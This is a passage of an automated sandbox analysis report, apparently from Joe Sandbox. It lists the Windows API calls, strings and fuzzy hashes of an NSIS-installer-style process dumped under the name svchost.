                              • GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038DC
                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403925
                                • Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B
                              • RegisterClassA.USER32(0042EBA0), ref: 00403962
                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039AF
                              • ShowWindow.USER32(00000005,00000000), ref: 004039E5
                              • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403A11
                              • GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A1E
                              • RegisterClassA.USER32(0042EBA0), ref: 00403A27
                              • DialogBoxParamA.USER32(?,00000000,00403B6B,00000000), ref: 00403A46
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                              • API String ID: 1975747703-2904746566
                              • Opcode ID: 6eb3a8c6d4b6a1eb21d80e3e72b0c71cc60e502e6c5045bb4d9ce0f5c3d8f447
                              • Instruction ID: 26e7699ed4e6b10e00d4509f8022fed07cb2a9a1b54ab9853cf40adcb97aba69
                              • Opcode Fuzzy Hash: 6eb3a8c6d4b6a1eb21d80e3e72b0c71cc60e502e6c5045bb4d9ce0f5c3d8f447
                              • Instruction Fuzzy Hash: 2B61C970340601BED620BB669D46F373EACEB54749F80447FF985B22E2CB7C59069A2D
                              APIs
                              • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404235
                              • GetDlgItem.USER32(00000000,000003E8), ref: 00404249
                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404267
                              • GetSysColor.USER32(?), ref: 00404278
                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404287
                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404296
                              • lstrlenA.KERNEL32(?), ref: 00404299
                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004042A8
                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042BD
                              • GetDlgItem.USER32(?,0000040A), ref: 0040431F
                              • SendMessageA.USER32(00000000), ref: 00404322
                              • GetDlgItem.USER32(?,000003E8), ref: 0040434D
                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040438D
                              • LoadCursorA.USER32(00000000,00007F02), ref: 0040439C
                              • SetCursor.USER32(00000000), ref: 004043A5
                              • LoadCursorA.USER32(00000000,00007F00), ref: 004043BB
                              • SetCursor.USER32(00000000), ref: 004043BE
                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043EA
                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043FE
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                              • String ID: N$uA@
                              • API String ID: 3103080414-3275078707
                              • Opcode ID: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                              • Instruction ID: fd9e69a661c90447e44b9af037de2c0158a1a23ec1d513a6b2b78bd76040a697
                              • Opcode Fuzzy Hash: 784cb9af6d000fd2d2211505c7c1138b1f5d3ae3139f868b4def1038197d9b74
                              • Instruction Fuzzy Hash: A26183B1A00205BFDB109F61DD45F6A7B69EB84705F10803AFB057A1D1C7B8A951CF58
                              APIs
                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                              • BeginPaint.USER32(?,?), ref: 00401047
                              • GetClientRect.USER32(?,?), ref: 0040105B
                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                              • DeleteObject.GDI32(?), ref: 004010ED
                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                              • SelectObject.GDI32(00000000,?), ref: 00401140
                              • DrawTextA.USER32(00000000,0042EC00,000000FF,00000010,00000820), ref: 00401156
                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                              • DeleteObject.GDI32(?), ref: 00401165
                              • EndPaint.USER32(?,?), ref: 0040116E
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                              • String ID: F
                              • API String ID: 941294808-1304234792
                              • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                              • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
                              • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                              • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
                              APIs
                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405DA0,?,?), ref: 00405C40
                              • GetShortPathNameA.KERNEL32(?,0042C600,00000400), ref: 00405C49
                                • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                                • Part of subcall function 00405A9E: lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                              • GetShortPathNameA.KERNEL32(?,0042CA00,00000400), ref: 00405C66
                              • wsprintfA.USER32 ref: 00405C84
                              • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405CBF
                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405CCE
                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D06
                              • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D5C
                              • GlobalFree.KERNEL32(00000000), ref: 00405D6D
                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D74
                                • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,00436C00,80000000,00000003), ref: 00405B3D
                                • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                              • String ID: %s=%s$[Rename]
                              • API String ID: 2171350718-1727408572
                              • Opcode ID: 2cfa5c40c2b605b7ef1c0ecf3cbe6f2e1654e9f538de3556496336cfe16ba9f3
                              • Instruction ID: 165561d39814ef1f1a34b1aa6794dd1f6cd1d2ce27369611909fe2f807e8c01f
                              • Opcode Fuzzy Hash: 2cfa5c40c2b605b7ef1c0ecf3cbe6f2e1654e9f538de3556496336cfe16ba9f3
                              • Instruction Fuzzy Hash: 5D310531200F19ABC2206B659D4DF6B3A5CDF45754F14443BFA01B62D2EA7CA8018EBD
                              APIs
                              • GetDlgItem.USER32(?,000003FB), ref: 00404520
                              • SetWindowTextA.USER32(00000000,?), ref: 0040454A
                              • SHBrowseForFolderA.SHELL32(?,00429C48,?), ref: 004045FB
                              • CoTaskMemFree.OLE32(00000000), ref: 00404606
                              • lstrcmpiA.KERNEL32(0042E3A0,0042A870), ref: 00404638
                              • lstrcatA.KERNEL32(?,0042E3A0), ref: 00404644
                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656
                                • Part of subcall function 004056A0: GetDlgItemTextA.USER32(?,?,00000400,0040468D), ref: 004056B3
                                • Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,00435000,76193410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                                • Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                                • Part of subcall function 0040620A: CharNextA.USER32(?,00435000,76193410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                                • Part of subcall function 0040620A: CharPrevA.USER32(?,?,76193410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                              • GetDiskFreeSpaceA.KERNEL32(00429840,?,?,0000040F,?,00429840,00429840,?,00000001,00429840,?,?,000003FB,?), ref: 00404714
                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F
                                • Part of subcall function 00404888: lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                                • Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
                                • Part of subcall function 00404888: SetDlgItemTextA.USER32(?,0042A870), ref: 00404941
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                              • String ID: A
                              • API String ID: 2624150263-3554254475
                              • Opcode ID: cdde6bf5d860e80b1670e7dcdf7f51639cc8ffce7cf8acda1903fa5029e0e2f5
                              • Instruction ID: e7408234a4186d1eb777f56003ea07db5a22e6c17a70b9954916109459a63af9
                              • Opcode Fuzzy Hash: cdde6bf5d860e80b1670e7dcdf7f51639cc8ffce7cf8acda1903fa5029e0e2f5
                              • Instruction Fuzzy Hash: EEA170B1900219ABDB11EFA6CD41AAF77B8EF85314F50843BF601B62D1DB7C89418B6D
                              APIs
                              • GetTickCount.KERNEL32 ref: 00402D74
                              • GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400), ref: 00402D90
                                • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,00436C00,80000000,00000003), ref: 00405B3D
                                • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                              • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,00000003), ref: 00402DDC
                              Strings
                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
                              • Error launching installer, xrefs: 00402DB3
                              • Inst, xrefs: 00402E48
                              • soft, xrefs: 00402E51
                              • Null, xrefs: 00402E5A
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                              • API String ID: 4283519449-1074636621
                              • Opcode ID: 0ada85f12cf01c90e965dc0c6425161c0b1bcf50f2fa52f3a00b6f97cbd218ea
                              • Instruction ID: 2bf3385630e85dd4df9d7bf2b803376e12afffe2b97a8d7f9aa5fd2bd7c684e6
                              • Opcode Fuzzy Hash: 0ada85f12cf01c90e965dc0c6425161c0b1bcf50f2fa52f3a00b6f97cbd218ea
                              • Instruction Fuzzy Hash: BD51F571900214ABDB219F65DE89B9F7AB8EB14368F50403BF904B72D0C7BC9D458BAD
                              APIs
                              • GetSystemDirectoryA.KERNEL32(0042E3A0,00000400), ref: 004060ED
                              • GetWindowsDirectoryA.KERNEL32(0042E3A0,00000400,?,0042A050,00000000,004050FF,0042A050,00000000), ref: 00406100
                              • SHGetSpecialFolderLocation.SHELL32(004050FF,761923A0,?,0042A050,00000000,004050FF,0042A050,00000000), ref: 0040613C
                              • SHGetPathFromIDListA.SHELL32(761923A0,0042E3A0), ref: 0040614A
                              • CoTaskMemFree.OLE32(761923A0), ref: 00406156
                              • lstrcatA.KERNEL32(0042E3A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
                              • lstrlenA.KERNEL32(0042E3A0,?,0042A050,00000000,004050FF,0042A050,00000000,00000000,?,761923A0), ref: 004061CC
                              Strings
                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406174
                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 004060BC
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                              • API String ID: 717251189-730719616
                              • Opcode ID: 51f7f20917835abc90d04fd7ead949147b631891de6bb8cdcea0e0046e261de2
                              • Instruction ID: 67ab450255a0c50706d08a2588864b7c9a920b8361f3652e316ab2a1c483ee89
                              • Opcode Fuzzy Hash: 51f7f20917835abc90d04fd7ead949147b631891de6bb8cdcea0e0046e261de2
                              • Instruction Fuzzy Hash: C661E375900105AEDB209F24CD84BBF7BA4AB15314F52413FEA03BA2D2C67C8962CB5D
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: CountTick$wsprintf
                              • String ID: (TA$(TA$... %d%%
                              • API String ID: 551687249-2950751476
                              • Opcode ID: a0691e7d4b1972c1c6b665dba6ae3b2a2bfd9af5d6c8964951a9ca70517b3b3f
                              • Instruction ID: 5c281e24a88a3bae7ae2a550c5808c60fec2149314028a17d76778b6f2aa7d1b
                              • Opcode Fuzzy Hash: a0691e7d4b1972c1c6b665dba6ae3b2a2bfd9af5d6c8964951a9ca70517b3b3f
                              • Instruction Fuzzy Hash: BB518171900219DBDB00DF66DA4479E7BB8EF4875AF10453BE814BB2D0C7789E40CBA9
                              APIs
                              • GetWindowLongA.USER32(?,000000EB), ref: 004040C3
                              • GetSysColor.USER32(00000000), ref: 00404101
                              • SetTextColor.GDI32(?,00000000), ref: 0040410D
                              • SetBkMode.GDI32(?,?), ref: 00404119
                              • GetSysColor.USER32(?), ref: 0040412C
                              • SetBkColor.GDI32(?,?), ref: 0040413C
                              • DeleteObject.GDI32(?), ref: 00404156
                              • CreateBrushIndirect.GDI32(?), ref: 00404160
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                              • String ID:
                              • API String ID: 2320649405-0
                              • Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                              • Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
                              • Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
                              • Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54
                              APIs
                              • lstrlenA.KERNEL32(0042A050,00000000,?,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                              • lstrlenA.KERNEL32(004030F7,0042A050,00000000,?,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                              • lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,?,761923A0), ref: 00405123
                              • SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                              • String ID:
                              • API String ID: 2531174081-0
                              • Opcode ID: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                              • Instruction ID: 4d1d9eb5ffa78b07b8376cbf0c4e91ada4ce3c5a86d4cc872ddc87c593067670
                              • Opcode Fuzzy Hash: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
                              • Instruction Fuzzy Hash: 69214A71900518BADB119FA5CD84A9FBFA9EB09354F14807AF944AA291C7398E418F98
                              APIs
                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
                              • GetMessagePos.USER32 ref: 004049B5
                              • ScreenToClient.USER32(?,?), ref: 004049CF
                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: Message$Send$ClientScreen
                              • String ID: f
                              • API String ID: 41195575-1993550816
                              • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                              • Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
                              • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                              • Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4
                              APIs
                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                              • MulDiv.KERNEL32(?,00000064,?), ref: 00402CC2
                              • wsprintfA.USER32 ref: 00402CD2
                              • SetWindowTextA.USER32(?,?), ref: 00402CE2
                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4
                              Strings
                              • verifying installer: %d%%, xrefs: 00402CCC
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: Text$ItemTimerWindowwsprintf
                              • String ID: verifying installer: %d%%
                              • API String ID: 1451636040-82062127
                              • Opcode ID: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                              • Instruction ID: 0a6faa1976aca28fcdfc9934e3507063152a2d7882a275f196f36718a2c25724
                              • Opcode Fuzzy Hash: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
                              • Instruction Fuzzy Hash: 8F014F7064020CFBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB989558F58
                              APIs
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                              • GlobalFree.KERNEL32(?), ref: 004027EB
                              • GlobalFree.KERNEL32(00000000), ref: 004027FE
                              • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                              • String ID:
                              • API String ID: 2667972263-0
                              • Opcode ID: d16b92c6e49c5f1eda150bd2065ff059c02a3c223b7b2492d8b40f99e43a7d67
                              • Instruction ID: a22fe22bcc3eabd59056b14894fa73c1d09c67f360634fc0aee3e8da3dcac443
                              • Opcode Fuzzy Hash: d16b92c6e49c5f1eda150bd2065ff059c02a3c223b7b2492d8b40f99e43a7d67
                              • Instruction Fuzzy Hash: 72219F71800124BBDF217FA5DE49E9E7B79AF09364F14423AF510762E0CB7959019FA8
                              APIs
                              • CharNextA.USER32(?,*?|<>/":,00000000,00435000,76193410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                              • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                              • CharNextA.USER32(?,00435000,76193410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                              • CharPrevA.USER32(?,?,76193410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: Char$Next$Prev
                              • String ID: *?|<>/":
                              • API String ID: 589700163-165019052
                              • Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                              • Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
                              • Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
                              • Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE
                              APIs
                              • lstrcatA.KERNEL32(00000000,00000000,0040A418,00435800,00000000,00000000,00000031), ref: 00401798
                              • CompareFileTime.KERNEL32(-00000014,?,0040A418,0040A418,00000000,00000000,0040A418,00435800,00000000,00000000,00000031), ref: 004017C2
                                • Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,0042EC00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD
                                • Part of subcall function 004050C7: lstrlenA.KERNEL32(0042A050,00000000,?,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
                                • Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,0042A050,00000000,?,761923A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
                                • Part of subcall function 004050C7: lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,?,761923A0), ref: 00405123
                                • Part of subcall function 004050C7: SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
                                • Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                              • String ID:
                              • API String ID: 1941528284-0
                              • Opcode ID: ec066fc1f791a28a9f0325cd86f74f0af079f58842eee79025982aaa23838273
                              • Instruction ID: 9917b4e32c30e3d06e99a245a18197bb2030eb542a9362b48aff858cdbf0b6bf
                              • Opcode Fuzzy Hash: ec066fc1f791a28a9f0325cd86f74f0af079f58842eee79025982aaa23838273
                              • Instruction Fuzzy Hash: C541A571A00515BACF107BA5CD45EAF3678EF45368F60823FF421F20E1D67C8A418AAE
                              APIs
                              • GetDC.USER32(?), ref: 00401D9E
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                              • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                              • CreateFontIndirectA.GDI32(0040B818), ref: 00401E20
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: CapsCreateDeviceFontIndirectRelease
                              • String ID:
                              • API String ID: 3808545654-0
                              • Opcode ID: e66b643645ae5869d7f803f1a931f06999308b12a2e1552bce617188d2388566
                              • Instruction ID: 674523e5e9bad331ced951479310ecf0af1814540c8bb9a1260b3d2be645706a
                              • Opcode Fuzzy Hash: e66b643645ae5869d7f803f1a931f06999308b12a2e1552bce617188d2388566
                              • Instruction Fuzzy Hash: 49017972944240AFD7006BB4AE5ABA93FF8DB59305F108439F141B61F2CB790445CF9D
                              APIs
                              • GetDlgItem.USER32(?), ref: 00401D45
                              • GetClientRect.USER32(00000000,?), ref: 00401D52
                              • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                              • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                              • DeleteObject.GDI32(00000000), ref: 00401D90
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                              • String ID:
                              • API String ID: 1849352358-0
                              • Opcode ID: 0eb514b26757c14dfc9e7ab691bd09cd0abb996a20804aaa0a787f0dfa13f32e
                              • Instruction ID: 19d294cafef6034250738095af8a4c7efea52b5f5fc7e0a3d6f731340b14d26e
                              • Opcode Fuzzy Hash: 0eb514b26757c14dfc9e7ab691bd09cd0abb996a20804aaa0a787f0dfa13f32e
                              • Instruction Fuzzy Hash: EAF0ECB2600515AFDB00ABA4DE89DAFB7BCEB44305B04447AF641F2191CA748D018B38
                              APIs
                              • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                              • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                              Strings
                              Memory Dump Source
                              • Source File: 0000000A.00000002.178560919782.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                              Similarity
                              • API ID: MessageSend$Timeout
                              • String ID: !
                              • API String ID: 1777923405-2657877971
                              • Opcode ID: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                              • Instruction ID: 6061c88af419790da573c0436b06ac7d5ed1a9fd9516c3c4f7c631bff8e6d743
                              • Opcode Fuzzy Hash: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
                              • Instruction Fuzzy Hash: 2621A271E44209BEEF15DFA5D986AAE7BB4EF84304F24843EF501B61D0CB7885418F28
                              APIs
                              • lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                              • wsprintfA.USER32 ref: 0040492E
                              • SetDlgItemTextA.USER32(?,0042A870), ref: 00404941
                              Strings
                              Memory Dump Source
